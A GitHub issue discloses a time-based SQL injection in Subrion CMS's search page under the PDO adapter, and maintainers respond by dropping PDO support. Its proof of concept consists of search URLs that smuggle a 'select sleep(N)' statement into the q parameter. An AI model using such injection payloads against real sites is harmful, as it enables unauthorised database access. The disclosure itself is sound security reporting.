Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a time-based sql injection if use PDO #817

Closed
yundiao opened this issue Apr 3, 2019 · 2 comments
Closed

There is a time-based sql injection if use PDO #817

yundiao opened this issue Apr 3, 2019 · 2 comments
Assignees

Comments

@yundiao
Copy link

yundiao commented Apr 3, 2019

I. Vulnerability Analysis
Subrion CMS supports three ways of connecting mysql: mysql, mysqli and PDO. The default is mysqli.
They are executed by three files in the /includes/classes/ directory.
ia.core.mysql.php
ia.core.mysqli.php
ia.core.pdo.php
If a website uses PDO connection, there will be a vulnerability.

II. Vulnerability testing
Using PDO connections requires modifying the file---- /includes/config. inc. php.
Change mysqli to pdo.
database_config

In the search page:
http://cms.im/search/

POC and testing:

/search/?q=);select%20sleep(1);--+

sleep(1)

/search/?q=);select%20sleep(5);--+

sleep(5)

/search/?q=);select%20sleep(10);--+

sleep(10)

@vbezruchkin
Copy link
Member

@AleksandrPanarin please drop support for PDO. We don't have any customers who use our system with non mysql.

AleksandrPanarin pushed a commit that referenced this issue Apr 24, 2019
vbezruchkin pushed a commit that referenced this issue Apr 24, 2019
@vbezruchkin
Copy link
Member

We decided to drop support for PDO as MySQLi seems to be the only adapter used by our customers.

Thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants